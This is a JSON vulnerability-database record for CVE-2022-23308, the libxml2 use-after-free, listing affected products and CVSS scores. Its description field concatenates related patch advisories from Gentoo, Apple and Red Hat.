"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "manageability software development kit",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.4"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "libxml2",
"scope": "lt",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.9.13"
},
{
"_id": null,
"model": "snapdrive",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.5"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "communications cloud native core network function cloud native environment",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "communications cloud native core network slice selection function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.6.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "8.6"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.6.6"
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.5"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql workbench",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.29"
},
{
"_id": null,
"model": "zfs storage appliance kit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.8"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.5"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core unified data repository",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network repository function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
}
],
"trust": 0.4
},
"cve": "CVE-2022-23308",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2022-23308",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-412332",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-23308",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-23308",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-23308",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202202-1722",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-412332",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2022-23308",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"description": {
"_id": null,
"data": "valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202210-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: libxml2: Multiple Vulnerabilities\n Date: October 16, 2022\n Bugs: #833809, #842261, #865727\n ID: 202210-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been discovered in libxml2, the worst of\nwhich could result in arbitrary code execution. \n\nBackground\n==========\n\nlibxml2 is the XML C parser and toolkit developed for the GNOME project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/libxml2 \u003c 2.10.2 \u003e= 2.10.2\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libxml2. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.10.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2022-23308\n https://nvd.nist.gov/vuln/detail/CVE-2022-23308\n[ 2 ] CVE-2022-29824\n https://nvd.nist.gov/vuln/detail/CVE-2022-29824\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202210-03\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-05-16-1 iOS 15.5 and iPadOS 15.5\n\niOS 15.5 and iPadOS 15.5 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213258. \n\nAppleAVD\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-26702: an anonymous researcher\n\nAppleGraphicsControl\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nCVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day\nInitiative\n\nAVEVideoEncoder\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-26736: an anonymous researcher\nCVE-2022-26737: an anonymous researcher\nCVE-2022-26738: an anonymous researcher\nCVE-2022-26739: an anonymous researcher\nCVE-2022-26740: an anonymous researcher\n\nDriverKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to execute arbitrary code\nwith system privileges\nDescription: An out-of-bounds access issue was addressed with\nimproved bounds checking. \nCVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)\n\nGPU Drivers\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-26744: an anonymous researcher\n\nImageIO\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A remote attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow issue was addressed with improved\ninput validation. \nCVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend\nMicro Zero Day Initiative\n\nIOKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition was addressed with improved locking. \nCVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab\n\nIOMobileFrameBuffer\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-26768: an anonymous researcher\n\nIOSurfaceAccelerator\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to execute arbitrary code\nwith kernel privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-26771: an anonymous researcher\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-26714: Peter Nguy\u1ec5n V\u0169 Ho\u00e0ng (@peternguyen14) of STAR Labs\n(@starlabs_sg)\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-26757: Ned Williamson of Google Project Zero\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: An attacker that has already achieved kernel code execution\nmay be able to bypass kernel memory mitigations\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)\n\nKernel\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious attacker with arbitrary read and write capability\nmay be able to bypass Pointer Authentication\nDescription: A race condition was addressed with improved state\nhandling. \nCVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)\n\nLaunchServices\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A sandboxed process may be able to circumvent sandbox\nrestrictions\nDescription: An access issue was addressed with additional sandbox\nrestrictions on third-party applications. \nCVE-2022-26706: Arsenii Kostromin (0x3c3e)\n\nlibxml2\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A remote attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-23308\n\nNotes\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing a large input may lead to a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2022-22673: Abhay Kailasia (@abhay_kailasia) of Lakshmi Narain\nCollege Of Technology Bhopal\n\nSafari Private Browsing\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious website may be able to track users in Safari\nprivate browsing mode\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-26731: an anonymous researcher\n\nSecurity\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious app may be able to bypass signature validation\nDescription: A certificate parsing issue was addressed with improved\nchecks. \nCVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)\n\nShortcuts\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A person with physical access to an iOS device may be able to\naccess photos from the lock screen\nDescription: An authorization issue was addressed with improved state\nmanagement. \nCVE-2022-26703: Salman Syed (@slmnsd551)\n\nWebKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing maliciously crafted web content may lead to code\nexecution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 238178\nCVE-2022-26700: ryuzaki\n\nWebKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 236950\nCVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua\nwingtecher lab\nWebKit Bugzilla: 237475\nCVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua\nwingtecher lab\nWebKit Bugzilla: 238171\nCVE-2022-26717: Jeonghoon Shin of Theori\n\nWebKit\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 238183\nCVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab\nWebKit Bugzilla: 238699\nCVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech\n\nWebRTC\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: Video self-preview in a webRTC call may be interrupted if the\nuser answers a phone call\nDescription: A logic issue in the handling of concurrent media was\naddressed with improved state handling. \nWebKit Bugzilla: 237524\nCVE-2022-22677: an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may disclose restricted memory\nDescription: A memory corruption issue was addressed with improved\nvalidation. \nCVE-2022-26745: an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to elevate privileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A remote attacker may be able to cause a denial of service\nDescription: This issue was addressed with improved checks. \nCVE-2015-4142: Kostya Kortchinsky of Google Security Team\n\nWi-Fi\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2\nand later, iPad 5th generation and later, iPad mini 4 and later, and\niPod touch (7th generation)\nImpact: A malicious application may be able to execute arbitrary code\nwith system privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2022-26762: Wang Yu of Cyberserval\n\nAdditional recognition\n\nAppleMobileFileIntegrity\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing\nfor their assistance. \n\nFaceTime\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing\nfor their assistance. \n\nWebKit\nWe would like to acknowledge James Lee, an anonymous researcher for\ntheir assistance. \n\nWi-Fi\nWe would like to acknowledge 08Tc3wBB of ZecOps Mobile EDR Team for\ntheir assistance. \n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom https://www.apple.com/itunes/ iTunes and Software Update on the\ndevice will automatically check Apple\u0027s update server on its weekly\nschedule. When an update is detected, it is downloaded and the option\nto be installed is presented to the user when the iOS device is\ndocked. We recommend applying the update immediately if possible. \nSelecting Don\u0027t Install will present the option the next time you\nconnect your iOS device. The automatic update process may take up to\na week depending on the day that iTunes or the device checks for\nupdates. You may manually obtain the update via the Check for Updates\nbutton within iTunes, or the Software Update on your device. To\ncheck that the iPhone, iPod touch, or iPad has been updated: *\nNavigate to Settings * Select General * Select About. The version\nafter applying this update will be \"iOS 15.5 and iPadOS 15.5\". \nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TQACgkQeC9qKD1p\nrhh9PRAApeuHnWvZRxSW/QArItDF2fA1eXCu7n9BwPA6CoqrU7v7aR6H/NQ3wes6\nxOjoRccHRCWRJ12RubM06ggC+WA/MLb96t2Wc4IUoFDkI3G6fp/I3aHpSONv4YMt\nEoHSGMpJ3qAb6Z60mIMcshsCtyv9k4LxpjOTnHKRLp/M4JLWG4CanOGpN2u/wPPV\nTpRY4jkZlAdvQK3qrPmA8aO5sWnbh5l//kUS6IL649seZQFUeZdz7QUyodjjqr2/\nXWyqsQC4mqVphxwvWDWA5J6/Zf7C7hNdZ1BE+SPpLhjEZlU6IYBFY2PLrg9NDTv8\nYMZpftlm5HQo3qmy/HLoiF8bIqgtdz+TpgNiT+TYz9+/pvP/hyGbX6xF9esKBVjj\n+1OUnd2GaLjSdY7o9WOtZgSJQxi1/R1X1+DjY1vI+d/TQZ+Sz58Me90R99aWc+Gc\n1B8e6FhjwT48rHJiuIw75ZW1orpUX6OL5vqdge0H1aJXm7EEUhByZvm2E2DajKu2\nmp2jr01UZyb3ro0qE1zpNitNORWAdvrlriIJxFVxtxW4MygMn8ThJ/Jz2LjquHvT\nEwvCyB9jaqPKja3b/dwzf/nowjw+aocxOjelW2Q/HcyR13YF2ZHd1+hNtG/7Isrx\nWIpI9nNAQQ2LCQIgL7/xCn6Yni9t3le3+eU+cdafoqJKTpETNbk=\n=OMfW\n-----END PGP SIGNATURE-----\n\n\n. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 8. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: Use-after-free of ID and IDREF attributes (CVE-2022-23308)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. Package List:\n\nRed Hat Enterprise Linux AppStream (v. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2062751 - CVE-2022-24730 argocd: path traversal and improper access control allows leaking out-of-bound files\n2062755 - CVE-2022-24731 argocd: path traversal allows leaking out-of-bound files\n2064682 - CVE-2022-1025 Openshift-Gitops: Improper access control allows admin privilege escalation\n\n5. Description:\n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 11\npackages that are part of the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Apache\nHTTP Server 2.4.37 Service Pack 10 and includes bug fixes and enhancements. \nRefer to the Release Notes for information on the most significant bug\nfixes and enhancements included in this release. Bugs fixed (https://bugzilla.redhat.com/):\n\n1950515 - CVE-2021-3541 libxml2: Exponential entity expansion attack bypasses all existing protection mechanisms\n1954225 - CVE-2021-3516 libxml2: Use-after-free in xmlEncodeEntitiesInternal() in entities.c\n1954232 - CVE-2021-3517 libxml2: Heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c\n1954242 - CVE-2021-3518 libxml2: Use-after-free in xmlXIncludeDoProcess() in xinclude.c\n1956522 - CVE-2021-3537 libxml2: NULL pointer dereference when post-validating mixed content parsed in recovery mode\n2056913 - CVE-2022-23308 libxml2: Use-after-free of ID and IDREF attributes\n2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates\n2064321 - CVE-2022-22720 httpd: Errors encountered during the discarding of request body lead to HTTP request smuggling\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes\nAdvisory ID: RHSA-2022:1081-01\nProduct: Red Hat ACM\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1081\nIssue date: 2022-03-28\nCVE Names: CVE-2019-5827 CVE-2019-13750 CVE-2019-13751\n CVE-2019-17594 CVE-2019-17595 CVE-2019-18218\n CVE-2019-19603 CVE-2019-20838 CVE-2020-12762\n CVE-2020-13435 CVE-2020-14155 CVE-2020-16135\n CVE-2020-24370 CVE-2021-3200 CVE-2021-3445\n CVE-2021-3521 CVE-2021-3580 CVE-2021-3712\n CVE-2021-3800 CVE-2021-3999 CVE-2021-20231\n CVE-2021-20232 CVE-2021-22876 CVE-2021-22898\n CVE-2021-22925 CVE-2021-23177 CVE-2021-28153\n CVE-2021-31566 CVE-2021-33560 CVE-2021-36084\n CVE-2021-36085 CVE-2021-36086 CVE-2021-36087\n CVE-2021-42574 CVE-2021-43565 CVE-2022-23218\n CVE-2022-23219 CVE-2022-23308 CVE-2022-23806\n CVE-2022-24407\n====================================================================\n1. Summary:\n\nGatekeeper Operator v0.2\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nGatekeeper Operator v0.2\n\nGatekeeper is an open source project that applies the OPA Constraint\nFramework to enforce policies on your Kubernetes clusters. \n\nThis advisory contains the container images for Gatekeeper that include\nsecurity updates, and container upgrades. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\nNote: Gatekeeper support from the Red Hat support team is limited cases\nwhere it is integrated and used with Red Hat Advanced Cluster Management\nfor Kubernetes. For support options for any other use, see the Gatekeeper\nopen source project website at:\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/. \n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n3. \n\nThe requirements to apply the upgraded images are different whether or not\nyou\nused the operator. Complete the following steps, depending on your\ninstallation:\n\n- - Upgrade gatekeeper operator:\nThe gatekeeper operator that is installed by the gatekeeper operator policy\nhas\n`installPlanApproval` set to `Automatic`. This setting means the operator\nwill\nbe upgraded automatically when there is a new version of the operator. No\nfurther action is required for upgrade. If you changed the setting for\n`installPlanApproval` to `manual`, then you must view each cluster to\nmanually\napprove the upgrade to the operator. \n\n- - Upgrade gatekeeper without the operator:\nThe gatekeeper version is specified as part of the Gatekeeper CR in the\ngatekeeper operator policy. To upgrade the gatekeeper version:\na) Determine the latest version of gatekeeper by visiting:\nhttps://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. \nb) Click the tag dropdown, and find the latest static tag. An example tag\nis\n\u0027v3.3.0-1\u0027. \nc) Edit the gatekeeper operator policy and update the image tag to use the\nlatest static tag. For example, you might change this line to image:\n\u0027registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1\u0027. \n\nRefer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/\nfor additional information. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n\n5. 